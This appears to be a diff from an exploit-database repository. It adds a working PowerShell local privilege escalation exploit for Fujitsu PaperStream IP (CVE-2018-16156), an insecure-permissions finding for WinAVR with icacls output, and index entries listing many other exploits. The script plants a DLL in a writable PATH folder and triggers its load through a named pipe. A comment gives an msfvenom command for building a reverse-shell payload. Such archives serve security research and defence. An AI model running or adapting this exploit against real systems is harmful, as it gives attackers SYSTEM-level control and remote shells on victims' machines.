BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr-strip.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-addr2line.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ar.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-as.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-c++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-c++filt.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-cpp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-g++.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcc-4.3.2.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcc.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gcov.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gdb.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-gprof.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-insight.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ld.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-nm.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-objcopy.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-objdump.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-ranlib.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-readelf.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-size.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-strings.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avr32-strip.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
avrdude.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
loaddrv.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
simulavr.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
splint.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_cat.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_cmp.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
srec_info.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
tclsh84.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
wish84.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
Successfully processed 54 files; Failed processing 0 files
PS C:\WinAVR-20100110\bin>
# Exploit:
This vulnerability could permit executing code with the escalated privileges by hijacking one of the DLLs or *.exe files.

63
exploits/windows/local/49382.ps1 Normal file
View file

@ -0,0 +1,63 @@
# Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
# Exploit Author: 1F98D
# Original Author: securifera
# Date: 12 May 2020
# Vendor Hompage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html
# CVE: CVE-2018-16156
# Tested on: Windows 10 x64
# References:
# https://www.securifera.com/advisories/cve-2018-16156/
# https://github.com/securifera/CVE-2018-16156-Exploit
# A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
# the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
# for a writable location, copies the specified DLL to that location and then
# triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
# named pipe.
$ErrorActionPreference = "Stop"
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=eth0 LPORT=4444
$PayloadFile = "C:\Windows\Temp\UninOldIS.dll"
if ((Test-Path $PayloadFile) -eq $false) {
Write-Host "$PayloadFile not found, did you forget to upload it?"
Exit 1
}
# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
try {
[IO.File]::OpenWrite("$_\x.txt").close()
Remove-Item "$_\x.txt"
$WritableDirectory = $_
} catch {}
}
if ($WritableDirectory -eq $null) {
Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
$client.Connect()
$reader = New-Object System.IO.StreamReader($client)
$writer = New-Object System.IO.StreamWriter($client)
$writer.AutoFlush = $true
$writer.Write("ChangeUninstallString")
$reader.ReadLine()
} finally {
$client.Dispose()
}
Write-Host "Payload triggered"

19
files_exploits.csv
View file

@ -11238,6 +11238,11 @@ id,file,description,date,author,type,platform,port
49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
49350,exploits/windows/local/49350.txt,"Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path",2021-01-05,"Geovanni Ruiz",local,windows,
49363,exploits/windows/local/49363.txt,"Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission",2021-01-05,"Adrian Bondocea",local,windows,
49370,exploits/python/local/49370.txt,"dirsearch 0.4.1 - CSV Injection",2021-01-06,"Dolev Farhi",local,python,
49371,exploits/windows/local/49371.txt,"IObit Uninstaller 10 Pro - Unquoted Service Path",2021-01-06,"Mayur Parmar",local,windows,
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43567,7 +43572,7 @@ id,file,description,date,author,type,platform,port
49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
49356,exploits/php/webapps/49356.txt,"Online Movie Streaming 1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,
49357,exploits/php/webapps/49357.txt,"Responsive ELearning System 1.0 - 'id' Sql Injection",2021-01-05,"Kshitiz Raj",webapps,php,
49357,exploits/php/webapps/49357.txt,"Responsive E-Learning System 1.0 - 'id' Sql Injection",2021-01-05,"Kshitiz Raj",webapps,php,
49358,exploits/php/webapps/49358.txt,"Baby Care System 1.0 - 'Post title' Stored XSS",2021-01-05,"Hardik Solanki",webapps,php,
49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,
49360,exploits/linux/webapps/49360.py,"Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)",2021-01-05,"Jeremy Brown",webapps,linux,
@ -43577,3 +43582,15 @@ id,file,description,date,author,type,platform,port
49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",2021-01-05,"Bedri Sertkaya",webapps,php,
49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",2021-01-05,B3KC4T,webapps,php,
49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting",2021-01-05,"Mesut Cetin",webapps,multiple,
49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",2021-01-06,"Rahul Ramakant Singh",webapps,php,
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",2021-01-06,MoeAlBarbari,webapps,multiple,
49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",2021-01-06,"Shivam Verma",webapps,php,
49374,exploits/php/webapps/49374.txt,"WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting",2021-01-06,"Nhat Ha",webapps,php,
49375,exploits/php/webapps/49375.txt,"Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE",2021-01-06,"Kshitiz Raj",webapps,php,
49376,exploits/php/webapps/49376.txt,"Responsive E-Learning System 1.0 - Stored Cross Site Scripting",2021-01-06,"Kshitiz Raj",webapps,php,
49377,exploits/php/webapps/49377.txt,"WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting",2021-01-06,"Mehmet Kelepçe",webapps,php,
49378,exploits/multiple/webapps/49378.txt,"Newgen Correspondence Management System (corms) eGov 12.0 - IDOR",2021-01-06,"ALI AL SINAN",webapps,multiple,
49380,exploits/php/webapps/49380.txt,"Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated)",2021-01-06,"Arnav Tripathy",webapps,php,
49381,exploits/php/webapps/49381.txt,"Resumes Management and Job Application Website 1.0 - Multiple Stored XSS",2021-01-06,"Arnav Tripathy",webapps,php,
49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,
49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,

Can't render this file because it is too large.